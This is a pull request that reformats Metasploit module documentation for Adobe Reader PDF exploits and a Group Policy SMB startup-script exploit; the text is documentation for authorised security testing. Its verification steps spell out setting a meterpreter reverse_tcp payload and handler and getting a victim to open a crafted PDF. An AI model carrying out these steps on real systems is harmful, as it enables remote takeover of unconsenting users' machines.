### PR TITLE
doc touchup

### DIFF
--- a/documentation/modules/exploit/windows/fileformat/adobe_geticon.md
+++ b/documentation/modules/exploit/windows/fileformat/adobe_geticon.md
@@ -1,59 +1,45 @@
 ## Vulnerable Application
 
-This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted pdf that a contains malformed `Collab.getIcon()` call, an attacker may be able to execute arbitrary code.
+This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1.
+By creating a specially crafted pdf that a contains malformed `Collab.getIcon()` call, an attacker may be able to execute arbitrary code.
 
-Link to vulnerable software (OldVersion)[http://www.oldversion.com/windows/download/acrobat-reader-8-0-0]
+Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/download/acrobat-reader-8-0-0)
 
 ### Test results (on Windows XP SP3)
-  reader 7.0.5 - no trigger
-  reader 7.0.8 - no trigger
-  reader 7.0.9 - no trigger
-  reader 7.1.0 - no trigger
-  reader 7.1.1 - reported not vulnerable
-  reader 8.0.0 - works
-  reader 8.1.2 - works
-  reader 8.1.3 - reported not vulnerable
-  reader 9.0.0 - works
-  reader 9.1.0 - reported not vulnerable
+
+  * reader 7.0.5 - no trigger
+  * reader 7.0.8 - no trigger
+  * reader 7.0.9 - no trigger
+  * reader 7.1.0 - no trigger
+  * reader 7.1.1 - reported not vulnerable
+  * reader 8.0.0 - works
+  * reader 8.1.2 - works
+  * reader 8.1.3 - reported not vulnerable
+  * reader 9.0.0 - works
+  * reader 9.1.0 - reported not vulnerable
 
 ## Options
 
-  ```
-  FILENAME
-  ```
+  **FILENAME**
+
   The file name
-
-  ```
-  PDF::Encoder [value]
-  ```
-  Select encoder for JavaScript Stream, valid values are ASCII85, FLATE, and ASCIIHEX
-
-  ```
-  PDF::Method [value]
-  ```
-  Select PAGE, DOCUMENT, or ANNOTATION
-
-  ```
-  PDF::Obfuscate [yes/no]
-  ```
-  Whether or not we should obfuscate the output
 
 ## Verification Steps
 
    1. Install application on the target machine
    2. Start msfconsole
-   3. Do: `use exploit/windows/fileformat/adobe_geticon`
-   4. Do: `set payload [windows/meterpreter/reverse_tcp]`
-   5. Do: `set LHOST [IP]`
-   6. Do: `exploit`
-   7. Do: `use [exploit/multi/handler]`
-   8. Do: `set LHOST [IP]`
-   9. Do: `exploit`
-   10. Do: `Open PDF on target machine with vulnerable software`
+   3. Do: ```use exploit/windows/fileformat/adobe_geticon```
+   4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
+   5. Do: ```set LHOST [IP]```
+   6. Do: ```exploit```
+   7. Do: ```use exploit/multi/handler```
+   8. Do: ```set LHOST [IP]```
+   9. Do: ```exploit```
+   10. Do: Open PDF on target machine with vulnerable software
 
 ## Scenarios
 
-### A run on Adobe Reader 8.0.0 and Windows XP (5.1 Build 2600, Service Pack 3)
+### Adobe Reader 8.0.0 on Windows XP (5.1 Build 2600, Service Pack 3)
 
   ```
   msf > use exploit/windows/fileformat/adobe_geticon

--- a/documentation/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe.md
+++ b/documentation/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe.md
@@ -2,46 +2,42 @@
 
 This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack.
 
-Link to vulnerable software (OldVersion)[http://www.oldversion.com/windows/download/acrobat-reader-8-2-0]
+Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/download/acrobat-reader-8-2-0)
 
 ## Verification Steps
 
    1. Install application on the target machine
    2. Start msfconsole
-   3. Do: `use exploit/windows/fileformat/adobe_pdf_embedded_exe`
-   4. Do: `set payload [windows/meterpreter/reverse_tcp]`
-   5. Do: `set LHOST [IP]`
-   6. Do: `exploit`
-   7. Do: `use [exploit/multi/handler]`
-   8. Do: `set LHOST [IP]`
-   9. Do: `exploit`
-   10. Do: `Open PDF on target machine with vulnerable software`
+   3. Do: ```use exploit/windows/fileformat/adobe_pdf_embedded_exe```
+   4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
+   5. Do: ```set LHOST [IP]```
+   6. Do: ```exploit```
+   7. Do: ```use exploit/multi/handler```
+   8. Do: ```set LHOST [IP]```
+   9. Do: ```exploit```
+   10. Do: Open PDF on target machine with vulnerable software
 
 ## Options
 
-  ```
-  EXENAME
-  ```
+  **EXENAME**
+
   The Name of payload exe.
 
-  ```
-  FILENAME
-  ```
+  **FILENAME**
+
   The output filename.
 
-  ```
-  INFILENAME
-  ```
+  **INFILENAME**
+
   The Input PDF filename.
 
-  ```
-  LAUNCH_MESSAGE
-  ```
-  The message to display in the File: area of the PDF.
+  **LAUNCH_MESSAGE**
+
+  The message to display in the `File:` area of the PDF.
 
 ## Scenarios
 
-### A run on Adobe Reader 8.2.0 and Windows XP (5.1 Build 2600, Service Pack 3)
+### Adobe Reader 8.2.0 on Windows XP (5.1 Build 2600, Service Pack 3)
 
   ```
   msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe

--- a/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md
+++ b/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md
@@ -1,37 +1,38 @@
 ## Vulnerable Application
 
-This module exploits a vulnerability in the U3D handling within versions 9.x through 9.4.6 and 10 through to 10.1.1 of Adobe Reader. The vulnerability is due to the use of uninitialized memory. Arbitrary code execution is achieved by embedding specially crafted U3D data into a PDF document. A heap spray via JavaScript is used in order to ensure that the memory used by the invalid pointer issue is controlled.
+This module exploits a vulnerability in the U3D handling within versions 9.x through 9.4.6 and 10 through to 10.1.1 of Adobe Reader.
+The vulnerability is due to the use of uninitialized memory. Arbitrary code execution is achieved by embedding specially
+crafted U3D data into a PDF document. A heap spray via JavaScript is used in order to ensure that the memory
+used by the invalid pointer issue is controlled.
 
-Link to vulnerable software (OldVersion)[http://www.oldversion.com/windows/download/acrobat-reader-9-4-0]
+Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/download/acrobat-reader-9-4-0)
 
 ## Verification Steps
 
    1. Install application on the target machine
    2. Start msfconsole
-   3. Do: `use exploit/windows/fileformat/adobe_reader_u3d`
-   4. Do: `set payload [windows/meterpreter/reverse_tcp]`
-   5. Do: `set LHOST [IP]`
-   6. Do: `exploit`
-   7. Do: `use [exploit/multi/handler]`
-   8. Do: `set LHOST [IP]`
-   9. Do: `exploit`
-   10. Do: `Open PDF on target machine with vulnerable software`
+   3. Do: ```use exploit/windows/fileformat/adobe_reader_u3d```
+   4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
+   5. Do: ```set LHOST [IP]```
+   6. Do: ```exploit```
+   7. Do: ```use [exploit/multi/handler```
+   8. Do: ```set LHOST [IP]```
+   9. Do: ```exploit```
+   10. Do: Open PDF on target machine with vulnerable software
 
 ## Options
 
-  ```
-  FILENAME
-  ```
+  **FILENAME**
+
   The file name.
 
-  ```
-  OBFUSCATE
-  ```
+  **OBFUSCATE**
+
   Enable JavaScript obfuscation
 
 ## Scenarios
 
-### A run on Adobe Reader 9.4.0 and Windows XP (5.1 Build 2600, Service Pack 3)
+### Adobe Reader 9.4.0 on Windows XP (5.1 Build 2600, Service Pack 3)
 
   ```
   msf > use exploit/windows/fileformat/adobe_reader_u3d

--- a/documentation/modules/exploit/windows/fileformat/adobe_utilprintf.md
+++ b/documentation/modules/exploit/windows/fileformat/adobe_utilprintf.md
@@ -1,25 +1,26 @@
 ## Vulnerable Application
 
-This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf() entry, an attacker may be able to execute arbitrary code.
+This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially
+crafted pdf that a contains malformed `util.printf()` entry, an attacker may be able to execute arbitrary code.
 
-Link to vulnerable software (OldVersion)[http://www.oldversion.com/windows/download/acrobat-reader-8-0-0]
+Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/download/acrobat-reader-8-0-0)
 
 ## Verification Steps
 
   1. Install application on the target machine
   2. Start msfconsole
-  3. Do: `use exploit/windows/fileformat/adobe_utilprintf`
-  4. Do: `set payload [windows/meterpreter/reverse_tcp]`
-  5. Do: `set LHOST [IP]`
-  6. Do: `exploit`
-  7. Do: `use [exploit/multi/handler]`
-  8. Do: `set LHOST [IP]`
-  9. Do: `exploit`
-  10. Do: `Open PDF on target machine with vulnerable software`
+  3. Do: ```use exploit/windows/fileformat/adobe_utilprintf```
+  4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
+  5. Do: ```set LHOST [IP]```
+  6. Do: ```exploit```
+  7. Do: ```use exploit/multi/handler```
+  8. Do: ```set LHOST [IP]```
+  9. Do: ```exploit```
+  10. Do: Open PDF on target machine with vulnerable software
 
 ## Scenarios
 
-### A run on Adobe Reader 8.0.0 and Windows XP (5.1 Build 2600, Service Pack 3)
+### Adobe Reader 8.0.0 on Windows XP (5.1 Build 2600, Service Pack 3)
 
   ```
   msf > use exploit/windows/fileformat/adobe_utilprintf

--- a/documentation/modules/exploit/windows/smb/group_policy_startup.md
+++ b/documentation/modules/exploit/windows/smb/group_policy_startup.md
@@ -1,36 +1,47 @@
 ## Vulnerable Application
 
-This is a general-purpose module for exploiting systems with Windows Group Policy configured to load VBS startup/logon scripts from remote locations. This module runs a SMB shared resource that will provide a payload through a VBS file. Startup scripts will be executed with SYSTEM privileges, while logon scripts will be executed with the user privileges. The attacker still needs to redirect the target traffic to the fake SMB share to exploit it successfully. Please note in some cases, it will take 5 to 10 minutes to receive a session.
+This is a general-purpose module for exploiting systems with Windows Group Policy configured to load VBS startup/logon scripts from remote locations.
+This module runs a SMB shared resource that will provide a payload through a VBS file. Startup scripts will be executed with SYSTEM privileges,
+while logon scripts will be executed with the user privileges. The attacker still needs to redirect the target traffic to the fake SMB
+share to exploit it successfully.
+
+Please note in some cases, it will take 5 to 10 minutes to receive a session.
 
 More information available at [Gotham Digital Science Security](https://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html)
 
 ## Verification Steps
 
   1. Start msfconsole
-  2. Do: `use modules/exploits/windows/smb/group_policy_startup`
-  3. Do: `exploit`
+  2. Do: ```use modules/exploits/windows/smb/group_policy_startup```
+  3. Do: ```exploit```
 
 ## Options
 
-  ```
-  FILE_NAME
-  ```
+  **FILE_NAME**
+
   VBS File name to share (Default: random .vbs)
 
-  ```
-  FOLDER_NAME
-  ```
+  **FOLDER_NAME**
+
   Folder name to share (Default: none)
 
-  ```
-  SHARE
-  ```
+  **SHARE**
+
   Share name (Default: Random)
 
 
 ## Scenarios
 
-A run on Windows 7 (x64, Build 7601, SP1) and Server 2016 (x64, Version 1607, OS Build 14393.970) using Group Policy applied from the Domain Controller.
+### Domain Group Policy
+
+In this scenario, the following computers are present:
+
+1. Windows 7 (x64, Build 7601, SP1): Victim
+2. Server 2016 (x64, Version 1607, OS Build 14393.970): Domain Controller
+
+The module sets up the SMB share and VBScript file. Out of band (outside the scope of this module or docs) a Group Policy is simply applied to the `OU` computer container.
+Next, the Win 7 box grabs the payload, in this case the meterpreter reverse_tcp stager on boot, with `SYSTEM` privs because its executed as a start up script.
+Theoretically, any computer in that `OU` would also execute the script on started up. 
 
   ```
   msf > use modules/exploits/windows/smb/group_policy_startup


### PR DESCRIPTION
A few touchups.  In general, try to keep long lines to a reasonable amount of characters, so they dont scroll off screen.
At some point you flipped the link syntax
Options should be in bold (**) not code (```)
The verification steps should be in triple ticks. It doesn't make a difference visually, but just for consistency with docs we've done in the past.  It may change in the future...